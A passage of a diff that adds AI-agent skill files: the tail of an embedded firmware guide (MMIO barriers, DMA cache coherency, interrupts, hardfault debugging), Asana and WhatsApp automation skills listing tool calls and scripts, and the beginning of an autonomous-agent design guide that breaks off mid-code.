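#define __DSB() __sync_synchronize()
#endif

static inline uint32_t mmio_read(volatile uint32_t *reg) {
    __DMB();                 /* order the read against earlier accesses */
    uint32_t value = *reg;
    __DMB();                 /* order later accesses against the read */
    return value;
}

static inline void mmio_write(volatile uint32_t *reg, uint32_t value) {
    *reg = value;
    __DSB();                 /* ensure the write completes before continuing */
}

static inline void mmio_modify(volatile uint32_t *reg, uint32_t clear, uint32_t set) {
    mmio_write(reg, (mmio_read(reg) & ~clear) | set);
}
```

Routing every register access through these three helpers keeps the barrier discipline in one place instead of scattered across drivers.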
### DMA and Cache Coherency

**CRITICAL:** ARM Cortex-M7 devices (Teensy 4.x, STM32 F7/H7) have data caches. DMA and the CPU can see different data without cache maintenance.

**Alignment Requirements (CRITICAL):**

- All DMA buffers: **32-byte aligned** (ARM Cortex-M7 cache line size)
- Buffer size: **multiple of 32 bytes**
- Violating alignment corrupts adjacent memory during cache invalidate

**Memory Placement Strategies (Best to Worst):**

1. **DTCM/SRAM** (Non-cacheable, fastest CPU access)
   - C++: `__attribute__((section(".dtcm.bss"))) __attribute__((aligned(32))) static uint8_t buffer[512];`
   - Rust: `#[link_section = ".dtcm"] #[repr(C, align(32))] static mut BUFFER: [u8; 512] = [0; 512];`

2. **MPU-configured non-cacheable regions** - Configure OCRAM/SRAM regions as non-cacheable via the MPU

3. **Cache Maintenance** (Last resort - slowest)
   - Before DMA reads from memory: `arm_dcache_flush_delete()` or `cortex_m::cache::clean_dcache_by_range()`
   - After DMA writes to memory: `arm_dcache_delete()` or `cortex_m::cache::invalidate_dcache_by_range()`

### Address Validation Helper (Debug Builds)

**Best practice:** Validate MMIO addresses in debug builds using `is_valid_mmio_address(addr)`, checking that the address is within valid peripheral ranges (e.g., 0x40000000-0x4FFFFFFF for peripherals, 0xE0000000-0xE00FFFFF for ARM Cortex-M system peripherals). Use `#ifdef DEBUG` guards and halt on invalid addresses.
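A sketch of that helper in C. The two windows are the generic ranges named above; real devices may expose additional peripheral regions, and the halt-on-failure loop is one possible debug policy, not a fixed API:

```c
#include <stdint.h>
#include <stdbool.h>

/* Generic Cortex-M windows: peripheral region and private peripheral bus.
 * Adjust per your device's reference manual. */
static bool is_valid_mmio_address(uint32_t addr) {
    bool in_peripheral = (addr >= 0x40000000u) && (addr <= 0x4FFFFFFFu);
    bool in_system     = (addr >= 0xE0000000u) && (addr <= 0xE00FFFFFu);
    return in_peripheral || in_system;
}

#ifdef DEBUG
/* Halt in debug builds so the bad address is visible under a debugger. */
#define MMIO_CHECK(addr) \
    do { if (!is_valid_mmio_address((uint32_t)(addr))) { for (;;) {} } } while (0)
#else
#define MMIO_CHECK(addr) ((void)0)
#endif
```

Calling `MMIO_CHECK()` at the top of each MMIO helper costs nothing in release builds and catches pointer bugs early in debug builds.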
### Write-1-to-Clear (W1C) Register Pattern

Many status registers (especially i.MX RT, STM32) clear by writing 1, not 0:

```cpp
uint32_t status = mmio_read(&USB1_USBSTS);
mmio_write(&USB1_USBSTS, status); // Write bits back to clear them
```

**Common W1C:** `USBSTS`, `PORTSC`, CCM status. **Wrong:** `status &= ~bit` does nothing on W1C registers.

### Platform Safety & Gotchas

**⚠️ Voltage Tolerances:**

- Most platforms: GPIO max 3.3V (NOT 5V tolerant except STM32 FT pins)
- Use level shifters for 5V interfaces
- Check datasheet current limits (typically 6-25mA)

**Teensy 4.x:** FlexSPI dedicated to Flash/PSRAM only • EEPROM emulated (limit writes <10Hz) • LPSPI max 30MHz • Never change CCM clocks while peripherals are active

**STM32 F7/H7:** Clock domain config per peripheral • Fixed DMA stream/channel assignments • GPIO speed affects slew rate/power

**nRF52:** SAADC needs calibration after power-on • GPIOTE limited (8 channels) • Radio shares priority levels

**SAMD:** SERCOM needs careful pin muxing • GCLK routing critical • Limited DMA on M0+ variants

### Modern Rust: Never Use `static mut`

**CORRECT Patterns:**

```rust
static READY: AtomicBool = AtomicBool::new(false);
static STATE: Mutex<RefCell<Option<T>>> = Mutex::new(RefCell::new(None));
// Access: critical_section::with(|cs| STATE.borrow_ref_mut(cs))
```

**WRONG:** `static mut` is undefined behavior (data races).

**Atomic Ordering:** `Relaxed` (CPU-only) • `Acquire/Release` (shared state) • `AcqRel` (CAS) • `SeqCst` (rarely needed)

---

## 🎯 Interrupt Priorities & NVIC Configuration

**Platform-Specific Priority Levels:**

- **M0/M0+**: 2-4 priority levels (limited)
- **M3/M4/M7**: 8-256 priority levels (configurable)

**Key Principles:**

- **Lower number = higher priority** (e.g., priority 0 preempts priority 1)
- **ISRs at the same priority level cannot preempt each other**
- Priority grouping: preemption priority vs sub-priority (M3/M4/M7)
- Reserve the highest priorities (0-2) for time-critical operations (DMA, timers)
- Use middle priorities (3-7) for normal peripherals (UART, SPI, I2C)
- Use the lowest priorities (8+) for background tasks

**Configuration:**

- C/C++: `NVIC_SetPriority(IRQn, priority)` or `HAL_NVIC_SetPriority()`
- Rust: `NVIC::set_priority()` or use PAC-specific functions

---

## 🔒 Critical Sections & Interrupt Masking

**Purpose:** Protect shared data from concurrent access by ISRs and main code.

**C/C++:**

```cpp
__disable_irq(); /* critical section */ __enable_irq(); // Blocks all

// M3/M4/M7: Mask only lower-priority interrupts
uint32_t basepri = __get_BASEPRI();
__set_BASEPRI(priority_threshold << (8 - __NVIC_PRIO_BITS));
/* critical section */
__set_BASEPRI(basepri);
```

**Rust:** `cortex_m::interrupt::free(|cs| { /* use cs token */ })`

**Best Practices:**

- **Keep critical sections SHORT** (microseconds, not milliseconds)
- Prefer BASEPRI over PRIMASK when possible (allows high-priority ISRs to run)
- Use atomic operations when feasible instead of disabling interrupts
- Document critical section rationale in comments

---

## 🐛 Hardfault Debugging Basics

**Common Causes:**

- Unaligned memory access (especially on M0/M0+)
- Null pointer dereference
- Stack overflow (SP corrupted or overflows into heap/data)
- Illegal instruction or executing data as code
- Writing to read-only memory or invalid peripheral addresses

**Inspection Pattern (M3/M4/M7):**

- Check `HFSR` (HardFault Status Register) for the fault type
- Check `CFSR` (Configurable Fault Status Register) for the detailed cause
- Check `MMFAR` / `BFAR` for the faulting address (if valid)
- Inspect the stack frame: `R0-R3, R12, LR, PC, xPSR`

**Platform Limitations:**

- **M0/M0+**: Limited fault information (no CFSR, MMFAR, BFAR)
- **M3/M4/M7**: Full fault registers available

**Debug Tip:** Use the hardfault handler to capture the stack frame and print/log registers before reset.
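The stacked frame can be decoded with a plain C helper. On exception entry the hardware pushes R0-R3, R12, LR, PC, xPSR in that order; obtaining `frame` from MSP/PSP normally needs a small assembly shim (checking bit 2 of EXC_RETURN), which is omitted from this sketch:

```c
#include <stdint.h>

/* Layout of the hardware-stacked exception frame (Cortex-M, no FPU state). */
typedef struct {
    uint32_t r0, r1, r2, r3, r12;
    uint32_t lr;   /* return address of the interrupted code path */
    uint32_t pc;   /* instruction that faulted */
    uint32_t xpsr;
} hardfault_frame_t;

/* Copy the eight stacked words into named fields for logging. */
static hardfault_frame_t decode_hardfault_frame(const uint32_t *frame) {
    hardfault_frame_t f;
    f.r0   = frame[0];
    f.r1   = frame[1];
    f.r2   = frame[2];
    f.r3   = frame[3];
    f.r12  = frame[4];
    f.lr   = frame[5];
    f.pc   = frame[6];
    f.xpsr = frame[7];
    return f;
}
```

Log `pc` first: it points at (or near) the faulting instruction, which `addr2line` can map back to source.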
---

## 📊 Cortex-M Architecture Differences

| Feature | M0/M0+ | M3 | M4/M4F | M7/M7F |
|---------|--------|----|--------|--------|
| **Max Clock** | ~50 MHz | ~100 MHz | ~180 MHz | ~600 MHz |
| **ISA** | Thumb-1 only | Thumb-2 | Thumb-2 + DSP | Thumb-2 + DSP |
| **MPU** | M0+ optional | Optional | Optional | Optional |
| **FPU** | No | No | M4F: single precision | M7F: single + double |
| **Cache** | No | No | No | I-cache + D-cache |
| **TCM** | No | No | No | ITCM + DTCM |
| **DWT** | No | Yes | Yes | Yes |
| **Fault Handling** | Limited (HardFault only) | Full | Full | Full |

---

## 🧮 FPU Context Saving

**Lazy Stacking (Default on M4F/M7F):** FPU context (S0-S15, FPSCR) is saved only if the ISR uses the FPU. This reduces latency for non-FPU ISRs but creates variable timing.

**Disable for deterministic latency:** Configure `FPU->FPCCR` (clear the LSPEN bit) in hard real-time systems or when ISRs always use the FPU.

---

## 🛡️ Stack Overflow Protection

**MPU Guard Pages (Best):** Configure a no-access MPU region below the stack. Triggers a MemManage fault on M3/M4/M7. Limited on M0/M0+.

**Canary Values (Portable):** Place a magic value (e.g., `0xDEADBEEF`) at the stack bottom and check it periodically.

**Watchdog:** Indirect detection via timeout; provides recovery. **Best:** MPU guard pages, else canary + watchdog.
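The canary variant fits in a few lines of portable C. Here `stack_bottom` stands in for the lowest word of the task stack, which would normally come from a linker symbol or TCB field; taking it as a parameter is an assumption of this sketch:

```c
#include <stdint.h>
#include <stdbool.h>

#define STACK_CANARY 0xDEADBEEFu

/* Plant the canary at the lowest word of the stack region at startup. */
static void stack_canary_init(volatile uint32_t *stack_bottom) {
    *stack_bottom = STACK_CANARY;
}

/* Call periodically (e.g. from a housekeeping timer). Returns false once
 * the stack has grown down far enough to overwrite the canary word. */
static bool stack_canary_ok(const volatile uint32_t *stack_bottom) {
    return *stack_bottom == STACK_CANARY;
}
```

A failed check only proves the overflow already happened, which is why it pairs with a watchdog for recovery rather than replacing MPU guard pages.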
---

## 🔄 Workflow

1. **Clarify Requirements** → target platform, peripheral type, protocol details (speed, mode, packet size)
2. **Design Driver Skeleton** → constants, structs, compile-time config
3. **Implement Core** → init(), ISR handlers, buffer logic, user-facing API
4. **Validate** → example usage + notes on timing, latency, throughput
5. **Optimize** → suggest DMA, interrupt priorities, or RTOS tasks if needed
6. **Iterate** → refine with improved versions as hardware interaction feedback is provided

---

## 🛠 Example: SPI Driver for External Sensor

**Pattern:** Create non-blocking SPI drivers with transaction-based read/write:

- Configure SPI (clock speed, mode, bit order)
- Use CS pin control with proper timing
- Abstract register read/write operations
- Example: `sensorReadRegister(0x0F)` for WHO_AM_I
- For high throughput (>500 kHz), use DMA transfers

**Platform-specific APIs:**

- **Teensy 4.x**: `SPI.beginTransaction(SPISettings(speed, order, mode))` → `SPI.transfer(data)` → `SPI.endTransaction()`
- **STM32**: `HAL_SPI_Transmit()` / `HAL_SPI_Receive()` or LL drivers
- **nRF52**: `nrfx_spi_xfer()` or `nrf_drv_spi_transfer()`
- **SAMD**: Configure SERCOM in SPI master mode with `SERCOM_SPI_MODE_MASTER`
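A platform-neutral sketch of that register read, with the byte exchange injected as a function pointer so the same logic maps onto `SPI.transfer`, the STM32 HAL calls, or `nrfx_spi_xfer`. The 0x80 read flag follows a common sensor convention (e.g. many ST IMUs) and is an assumption, not a specific datasheet:

```c
#include <stdint.h>

/* Stand-in for the platform's SPI byte exchange: send one byte, return
 * the byte clocked in at the same time. */
typedef uint8_t (*spi_xfer_fn)(uint8_t out);

#define SPI_READ_FLAG 0x80u

/* Two-phase register read: address byte with the read bit set, then a
 * dummy byte to clock the reply out of the sensor. */
static uint8_t sensor_read_register(spi_xfer_fn xfer, uint8_t reg) {
    (void)xfer(reg | SPI_READ_FLAG);
    return xfer(0x00u);
}

/* Fake bus used for illustration: answers 0x6A to the data phase. */
static uint8_t fake_xfer(uint8_t out) {
    static uint8_t phase = 0;
    (void)out;
    return (phase++ == 0) ? 0x00u : 0x6Au;
}
```

On real hardware you would assert the CS line around the two transfers and wrap the pair in a transaction; injecting the transfer function is what makes the driver logic unit-testable off-target.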
175
packages/llm/skills/asana-automation/SKILL.md
Normal file
@@ -0,0 +1,175 @@
---
name: asana-automation
description: "Automate Asana tasks via Rube MCP (Composio): tasks, projects, sections, teams, workspaces. Always search tools first for current schemas."
risk: unknown
source: community
date_added: "2026-02-27"
---

# Asana Automation via Rube MCP

Automate Asana operations through Composio's Asana toolkit via Rube MCP.

## Prerequisites

- Rube MCP must be connected (RUBE_SEARCH_TOOLS available)
- Active Asana connection via `RUBE_MANAGE_CONNECTIONS` with toolkit `asana`
- Always call `RUBE_SEARCH_TOOLS` first to get current tool schemas

## Setup

**Get Rube MCP**: Add `https://rube.app/mcp` as an MCP server in your client configuration. No API keys needed — just add the endpoint and it works.

1. Verify Rube MCP is available by confirming `RUBE_SEARCH_TOOLS` responds
2. Call `RUBE_MANAGE_CONNECTIONS` with toolkit `asana`
3. If the connection is not ACTIVE, follow the returned auth link to complete Asana OAuth
4. Confirm the connection status shows ACTIVE before running any workflows

## Core Workflows

### 1. Manage Tasks

**When to use**: User wants to create, search, list, or organize tasks

**Tool sequence**:

1. `ASANA_GET_MULTIPLE_WORKSPACES` - Get workspace ID [Prerequisite]
2. `ASANA_SEARCH_TASKS_IN_WORKSPACE` - Search tasks [Optional]
3. `ASANA_GET_TASKS_FROM_A_PROJECT` - List project tasks [Optional]
4. `ASANA_CREATE_A_TASK` - Create a new task [Optional]
5. `ASANA_GET_A_TASK` - Get task details [Optional]
6. `ASANA_CREATE_SUBTASK` - Create a subtask [Optional]
7. `ASANA_GET_TASK_SUBTASKS` - List subtasks [Optional]

**Key parameters**:

- `workspace`: Workspace GID (required for search/creation)
- `projects`: Array of project GIDs to add the task to
- `name`: Task name
- `notes`: Task description
- `assignee`: Assignee (user GID or email)
- `due_on`: Due date (YYYY-MM-DD)

**Pitfalls**:

- Workspace GID is required for most operations; get it first
- Task GIDs are returned as strings, not integers
- Search is workspace-scoped, not project-scoped

### 2. Manage Projects and Sections

**When to use**: User wants to create projects, manage sections, or organize tasks

**Tool sequence**:

1. `ASANA_GET_WORKSPACE_PROJECTS` - List workspace projects [Optional]
2. `ASANA_GET_A_PROJECT` - Get project details [Optional]
3. `ASANA_CREATE_A_PROJECT` - Create a new project [Optional]
4. `ASANA_GET_SECTIONS_IN_PROJECT` - List sections [Optional]
5. `ASANA_CREATE_SECTION_IN_PROJECT` - Create a new section [Optional]
6. `ASANA_ADD_TASK_TO_SECTION` - Move task to section [Optional]
7. `ASANA_GET_TASKS_FROM_A_SECTION` - List tasks in section [Optional]

**Key parameters**:

- `project_gid`: Project GID
- `name`: Project or section name
- `workspace`: Workspace GID for creation
- `task`: Task GID for section assignment
- `section`: Section GID

**Pitfalls**:

- Projects belong to workspaces; a workspace GID is needed for creation
- Sections are ordered within a project
- DUPLICATE_PROJECT creates a copy with optional task inclusion

### 3. Manage Teams and Users

**When to use**: User wants to list teams, team members, or workspace users

**Tool sequence**:

1. `ASANA_GET_TEAMS_IN_WORKSPACE` - List workspace teams [Optional]
2. `ASANA_GET_USERS_FOR_TEAM` - List team members [Optional]
3. `ASANA_GET_USERS_FOR_WORKSPACE` - List all workspace users [Optional]
4. `ASANA_GET_CURRENT_USER` - Get the authenticated user [Optional]
5. `ASANA_GET_MULTIPLE_USERS` - Get multiple user details [Optional]

**Key parameters**:

- `workspace_gid`: Workspace GID
- `team_gid`: Team GID

**Pitfalls**:

- Users are workspace-scoped
- Team membership requires the team GID

### 4. Parallel Operations

**When to use**: User needs to perform bulk operations efficiently

**Tool sequence**:

1. `ASANA_SUBMIT_PARALLEL_REQUESTS` - Execute multiple API calls in parallel [Required]

**Key parameters**:

- `actions`: Array of action objects with method, path, and data

**Pitfalls**:

- Each action must be a valid Asana API call
- Failed individual requests do not roll back successful ones

## Common Patterns

### ID Resolution

**Workspace name -> GID**:

```
1. Call ASANA_GET_MULTIPLE_WORKSPACES
2. Find workspace by name
3. Extract gid field
```

**Project name -> GID**:

```
1. Call ASANA_GET_WORKSPACE_PROJECTS with workspace GID
2. Find project by name
3. Extract gid field
```

### Pagination

- Asana uses cursor-based pagination with an `offset` parameter
- Check for `next_page` in the response
- Pass `offset` from `next_page.offset` for the next request

## Known Pitfalls

**GID Format**:

- All Asana IDs are strings (GIDs), not integers
- GIDs are globally unique identifiers

**Workspace Scoping**:

- Most operations require a workspace context
- Tasks, projects, and users are workspace-scoped

## Quick Reference

| Task | Tool Slug | Key Params |
|------|-----------|------------|
| List workspaces | ASANA_GET_MULTIPLE_WORKSPACES | (none) |
| Search tasks | ASANA_SEARCH_TASKS_IN_WORKSPACE | workspace, text |
| Create task | ASANA_CREATE_A_TASK | workspace, name, projects |
| Get task | ASANA_GET_A_TASK | task_gid |
| Create subtask | ASANA_CREATE_SUBTASK | parent, name |
| List subtasks | ASANA_GET_TASK_SUBTASKS | task_gid |
| Project tasks | ASANA_GET_TASKS_FROM_A_PROJECT | project_gid |
| List projects | ASANA_GET_WORKSPACE_PROJECTS | workspace |
| Create project | ASANA_CREATE_A_PROJECT | workspace, name |
| Get project | ASANA_GET_A_PROJECT | project_gid |
| Duplicate project | ASANA_DUPLICATE_PROJECT | project_gid |
| List sections | ASANA_GET_SECTIONS_IN_PROJECT | project_gid |
| Create section | ASANA_CREATE_SECTION_IN_PROJECT | project_gid, name |
| Add to section | ASANA_ADD_TASK_TO_SECTION | section, task |
| Section tasks | ASANA_GET_TASKS_FROM_A_SECTION | section_gid |
| List teams | ASANA_GET_TEAMS_IN_WORKSPACE | workspace_gid |
| Team members | ASANA_GET_USERS_FOR_TEAM | team_gid |
| Workspace users | ASANA_GET_USERS_FOR_WORKSPACE | workspace_gid |
| Current user | ASANA_GET_CURRENT_USER | (none) |
| Parallel requests | ASANA_SUBMIT_PARALLEL_REQUESTS | actions |

## When to Use

Use this skill to execute the workflows and actions described above.
258
packages/llm/skills/automate-whatsapp/SKILL.md
Normal file
@ -0,0 +1,258 @@
|
||||
---
name: automate-whatsapp
description: "Build WhatsApp automations with Kapso workflows: configure WhatsApp triggers, edit workflow graphs, manage executions, deploy functions, and use databases/integrations for state. Use when automatin..."
risk: safe
source: "https://github.com/gokapso/agent-skills/tree/master/skills/automate-whatsapp"
date_added: "2026-02-27"
---

# Automate WhatsApp

## When to use

Use this skill to build and run WhatsApp automations: workflow CRUD, graph edits, triggers, executions, function management, app integrations, and D1 database operations.

## Setup

Env vars:

- `KAPSO_API_BASE_URL` (host only, no `/platform/v1`)
- `KAPSO_API_KEY`

## How to
### Edit a workflow graph

1. Fetch graph: `node scripts/get-graph.js <workflow_id>` (note the `lock_version`)
2. Edit the JSON (see graph rules below)
3. Validate: `node scripts/validate-graph.js --definition-file <path>`
4. Update: `node scripts/update-graph.js <workflow_id> --expected-lock-version <n> --definition-file <path>`
5. Re-fetch to confirm

For small edits, use `edit-graph.js` with `--old-file` and `--new-file` instead.

If you get a lock_version conflict: re-fetch, re-apply changes, retry with the new lock_version.
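The conflict handling above is plain optimistic concurrency. A minimal Python sketch; `fetch_graph` and `push_graph` are hypothetical callables standing in for the `get-graph.js` and `update-graph.js` invocations, not real APIs:

```python
def update_with_retry(fetch_graph, push_graph, edit, max_attempts=3):
    """Optimistic-concurrency update: on a lock_version conflict,
    re-fetch, re-apply the edit, and retry with the new lock_version."""
    for _ in range(max_attempts):
        graph = fetch_graph()  # {"definition": ..., "lock_version": n}
        new_definition = edit(graph["definition"])  # re-apply edit to a fresh copy
        if push_graph(new_definition, expected_lock_version=graph["lock_version"]):
            return True  # server accepted the expected lock_version
    return False  # gave up after repeated conflicts
```

Re-applying the edit to a freshly fetched definition (rather than re-sending the stale one) is what keeps the retry safe against concurrent writers.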
### Manage triggers

1. List: `node scripts/list-triggers.js <workflow_id>`
2. Create: `node scripts/create-trigger.js <workflow_id> --trigger-type <type> --phone-number-id <id>`
3. Toggle: `node scripts/update-trigger.js --trigger-id <id> --active true|false`
4. Delete: `node scripts/delete-trigger.js --trigger-id <id>`

For inbound_message triggers, first run `node scripts/list-whatsapp-phone-numbers.js` to get `phone_number_id`.
### Debug executions

1. List: `node scripts/list-executions.js <workflow_id>`
2. Inspect: `node scripts/get-execution.js <execution-id>`
3. Get value: `node scripts/get-context-value.js <execution-id> --variable-path vars.foo`
4. Events: `node scripts/list-execution-events.js <execution-id>`
### Create and deploy a function

1. Write code with the handler signature (see function rules below)
2. Create: `node scripts/create-function.js --name <name> --code-file <path>`
3. Deploy: `node scripts/deploy-function.js --function-id <id>`
4. Verify: `node scripts/get-function.js --function-id <id>`
### Set up agent node with app integrations

1. Find model: `node scripts/list-provider-models.js`
2. Find account: `node scripts/list-accounts.js --app-slug <slug>` (use `pipedream_account_id`)
3. Find action: `node scripts/search-actions.js --query <word> --app-slug <slug>` (action_id = key)
4. Create integration: `node scripts/create-integration.js --action-id <id> --app-slug <slug> --account-id <id> --configured-props <json>`
5. Add tools to the agent node via `flow_agent_app_integration_tools`
### Database CRUD

1. List tables: `node scripts/list-tables.js`
2. Query: `node scripts/query-rows.js --table <name> --filters <json>`
3. Create/update/delete with the row scripts
## Graph rules

- Exactly one start node with `id` = `start`
- Never change existing node IDs
- Use `{node_type}_{timestamp_ms}` for new node IDs
- Non-decide nodes have 0 or 1 outgoing `next` edge
- Decide edge labels must match `conditions[].label`
- Edge keys are `source`/`target`/`label` (not `from`/`to`)

For full schema details, see `references/graph-contract.md`.
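The rules above can be checked mechanically before calling the update script. A minimal local sketch; the `nodes`/`edges`/`type`/`conditions` field names are assumptions inferred from this list, not the full contract in `references/graph-contract.md`:

```python
def check_graph_rules(graph):
    """Return a list of violations of the graph rules listed above."""
    errors = []
    nodes = {n["id"]: n for n in graph.get("nodes", [])}
    edges = graph.get("edges", [])

    # Exactly one start node with id == "start"
    if "start" not in nodes:
        errors.append("missing start node with id 'start'")

    # Edge keys are source/target/label, not from/to
    for e in edges:
        if "from" in e or "to" in e:
            errors.append("edge uses from/to instead of source/target")

    for node_id, node in nodes.items():
        outgoing = [e for e in edges if e.get("source") == node_id]
        if node.get("type") == "decide":
            # Decide edge labels must match conditions[].label
            labels = {c["label"] for c in node.get("conditions", [])}
            for e in outgoing:
                if e.get("label") not in labels:
                    errors.append(f"decide edge label {e.get('label')!r} not in conditions")
        elif len(outgoing) > 1:
            # Non-decide nodes have 0 or 1 outgoing edge
            errors.append(f"node {node_id!r} has {len(outgoing)} outgoing edges")
    return errors
```

Running a check like this locally catches the cheap structural mistakes before burning a `lock_version` round-trip on the server.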
## Function rules

```js
async function handler(request, env) {
  // Parse input
  const body = await request.json();
  // Use env.KV and env.DB as needed
  return new Response(JSON.stringify({ result: "ok" }));
}
```

- Do NOT use `export`, `export default`, or arrow functions
- Return a `Response` object
## Execution context

Always use this structure:

- `vars` - user-defined variables
- `system` - system variables
- `context` - channel data
- `metadata` - request metadata
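`get-context-value.js --variable-path vars.foo` resolves a dotted path against this structure. A minimal sketch of that lookup (not the script's actual implementation):

```python
def get_context_value(context, variable_path):
    """Resolve a dotted path like 'vars.foo.bar' against the execution context."""
    value = context
    for key in variable_path.split("."):
        if not isinstance(value, dict) or key not in value:
            return None  # a missing path resolves to None rather than raising
        value = value[key]
    return value
```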
## Scripts

### Workflows

| Script | Purpose |
|--------|---------|
| `list-workflows.js` | List workflows (metadata only) |
| `get-workflow.js` | Get workflow metadata |
| `create-workflow.js` | Create a workflow |
| `update-workflow-settings.js` | Update workflow settings |

### Graph

| Script | Purpose |
|--------|---------|
| `get-graph.js` | Get workflow graph + lock_version |
| `edit-graph.js` | Patch graph via string replacement |
| `update-graph.js` | Replace entire graph |
| `validate-graph.js` | Validate graph structure locally |

### Triggers

| Script | Purpose |
|--------|---------|
| `list-triggers.js` | List triggers for a workflow |
| `create-trigger.js` | Create a trigger |
| `update-trigger.js` | Enable/disable a trigger |
| `delete-trigger.js` | Delete a trigger |
| `list-whatsapp-phone-numbers.js` | List phone numbers for trigger setup |

### Executions

| Script | Purpose |
|--------|---------|
| `list-executions.js` | List executions |
| `get-execution.js` | Get execution details |
| `get-context-value.js` | Read value from execution context |
| `update-execution-status.js` | Force execution state |
| `resume-execution.js` | Resume waiting execution |
| `list-execution-events.js` | List execution events |

### Functions

| Script | Purpose |
|--------|---------|
| `list-functions.js` | List project functions |
| `get-function.js` | Get function details + code |
| `create-function.js` | Create a function |
| `update-function.js` | Update function code |
| `deploy-function.js` | Deploy function to runtime |
| `invoke-function.js` | Invoke function with payload |
| `list-function-invocations.js` | List function invocations |

### App integrations

| Script | Purpose |
|--------|---------|
| `list-apps.js` | Search integration apps |
| `search-actions.js` | Search actions (action_id = key) |
| `get-action-schema.js` | Get action JSON schema |
| `list-accounts.js` | List connected accounts |
| `create-connect-token.js` | Create OAuth connect link |
| `configure-prop.js` | Resolve remote_options for a prop |
| `reload-props.js` | Reload dynamic props |
| `list-integrations.js` | List saved integrations |
| `create-integration.js` | Create an integration |
| `update-integration.js` | Update an integration |
| `delete-integration.js` | Delete an integration |

### Databases

| Script | Purpose |
|--------|---------|
| `list-tables.js` | List D1 tables |
| `get-table.js` | Get table schema + sample rows |
| `query-rows.js` | Query rows with filters |
| `create-row.js` | Create a row |
| `update-row.js` | Update rows |
| `upsert-row.js` | Upsert a row |
| `delete-row.js` | Delete rows |

### OpenAPI

| Script | Purpose |
|--------|---------|
| `openapi-explore.mjs` | Explore OpenAPI (search/op/schema/where) |

Install deps (once):

```bash
npm i
```

Examples:

```bash
node scripts/openapi-explore.mjs --spec workflows search "variables"
node scripts/openapi-explore.mjs --spec workflows op getWorkflowVariables
node scripts/openapi-explore.mjs --spec platform op queryDatabaseRows
```
## Notes

- Prefer file paths over inline JSON (`--definition-file`, `--code-file`)
- `action_id` is the same as `key` from `search-actions`
- `--account-id` uses `pipedream_account_id` from `list-accounts`
- Variable CRUD (`variables-set.js`, `variables-delete.js`) is blocked - the Platform API doesn't support it
- Raw SQL execution is not supported via the Platform API
## References

Read before editing:

- references/graph-contract.md - Graph schema, computed vs editable fields, lock_version
- references/node-types.md - Node types and config shapes
- references/workflow-overview.md - Execution flow and states

Other references:

- references/execution-context.md - Context structure and variable substitution
- references/triggers.md - Trigger types and setup
- references/app-integrations.md - App integration and variable_definitions
- references/functions-reference.md - Function management
- references/functions-payloads.md - Payload shapes for functions
- references/databases-reference.md - Database operations
## Assets

| File | Description |
|------|-------------|
| `workflow-linear.json` | Minimal linear workflow |
| `workflow-decision.json` | Minimal branching workflow |
| `workflow-agent-simple.json` | Minimal agent workflow |
| `workflow-customer-support-intake-agent.json` | Customer support intake |
| `workflow-interactive-buttons-decide-function.json` | Interactive buttons + decide (function) |
| `workflow-interactive-buttons-decide-ai.json` | Interactive buttons + decide (AI) |
| `workflow-api-template-wait-agent.json` | API trigger + template + agent |
| `function-decide-route-interactive-buttons.json` | Function for button routing |
| `agent-app-integration-example.json` | Agent node with app integrations |
## Related skills

- `integrate-whatsapp` - Onboarding, webhooks, messaging, templates, flows
- `observe-whatsapp` - Debugging, logs, health checks
<!-- FILEMAP:BEGIN -->
```text
[automate-whatsapp file map]|root: .
|.:{package.json,SKILL.md}
|assets:{agent-app-integration-example.json,databases-example.json,function-decide-route-interactive-buttons.json,functions-example.json,workflow-agent-simple.json,workflow-api-template-wait-agent.json,workflow-customer-support-intake-agent.json,workflow-decision.json,workflow-interactive-buttons-decide-ai.json,workflow-interactive-buttons-decide-function.json,workflow-linear.json}
|references:{app-integrations.md,databases-reference.md,execution-context.md,function-contracts.md,functions-payloads.md,functions-reference.md,graph-contract.md,node-types.md,triggers.md,workflow-overview.md,workflow-reference.md}
|scripts:{configure-prop.js,create-connect-token.js,create-function.js,create-integration.js,create-row.js,create-trigger.js,create-workflow.js,delete-integration.js,delete-row.js,delete-trigger.js,deploy-function.js,edit-graph.js,get-action-schema.js,get-context-value.js,get-execution-event.js,get-execution.js,get-function.js,get-graph.js,get-table.js,get-workflow.js,invoke-function.js,list-accounts.js,list-apps.js,list-execution-events.js,list-executions.js,list-function-invocations.js,list-functions.js,list-integrations.js,list-provider-models.js,list-tables.js,list-triggers.js,list-whatsapp-phone-numbers.js,list-workflows.js,openapi-explore.mjs,query-rows.js,reload-props.js,resume-execution.js,search-actions.js,update-execution-status.js,update-function.js,update-graph.js,update-integration.js,update-row.js,update-trigger.js,update-workflow-settings.js,upsert-row.js,validate-graph.js,variables-delete.js,variables-list.js,variables-set.js}
|scripts/lib/databases:{args.js,filters.js,kapso-api.js}
|scripts/lib/functions:{args.js,kapso-api.js}
|scripts/lib/workflows:{args.js,kapso-api.js,result.js}
```
<!-- FILEMAP:END -->
764 packages/llm/skills/autonomous-agent-patterns/SKILL.md Normal file
@@ -0,0 +1,764 @@
---
name: autonomous-agent-patterns
description: "Design patterns for building autonomous coding agents. Covers tool integration, permission systems, browser automation, and human-in-the-loop workflows. Use when building AI agents, designing tool ..."
risk: unknown
source: community
date_added: "2026-02-27"
---
# 🕹️ Autonomous Agent Patterns

> Design patterns for building autonomous coding agents, inspired by [Cline](https://github.com/cline/cline) and [OpenAI Codex](https://github.com/openai/codex).

## When to Use This Skill

Use this skill when:

- Building autonomous AI agents
- Designing tool/function calling APIs
- Implementing permission and approval systems
- Creating browser automation for agents
- Designing human-in-the-loop workflows

---
## 1. Core Agent Architecture

### 1.1 Agent Loop

```
┌─────────────────────────────────────────────────────────────┐
│                         AGENT LOOP                          │
│                                                             │
│   ┌──────────┐    ┌──────────┐    ┌──────────┐              │
│   │  Think   │───▶│  Decide  │───▶│   Act    │              │
│   │ (Reason) │    │  (Plan)  │    │ (Execute)│              │
│   └──────────┘    └──────────┘    └──────────┘              │
│        ▲                               │                    │
│        │       ┌──────────┐            │                    │
│        └───────│ Observe  │◀───────────┘                    │
│                │ (Result) │                                 │
│                └──────────┘                                 │
└─────────────────────────────────────────────────────────────┘
```
```python
import json
from typing import Any

class AgentLoop:
    def __init__(self, llm, tools, max_iterations=50):
        self.llm = llm
        self.tools = {t.name: t for t in tools}
        self.max_iterations = max_iterations
        self.history = []

    def run(self, task: str) -> str:
        self.history.append({"role": "user", "content": task})

        for i in range(self.max_iterations):
            # Think: Get LLM response with tool options
            response = self.llm.chat(
                messages=self.history,
                tools=self._format_tools(),
                tool_choice="auto"
            )

            # Decide: Check if agent wants to use a tool
            if response.tool_calls:
                for tool_call in response.tool_calls:
                    # Act: Execute the tool
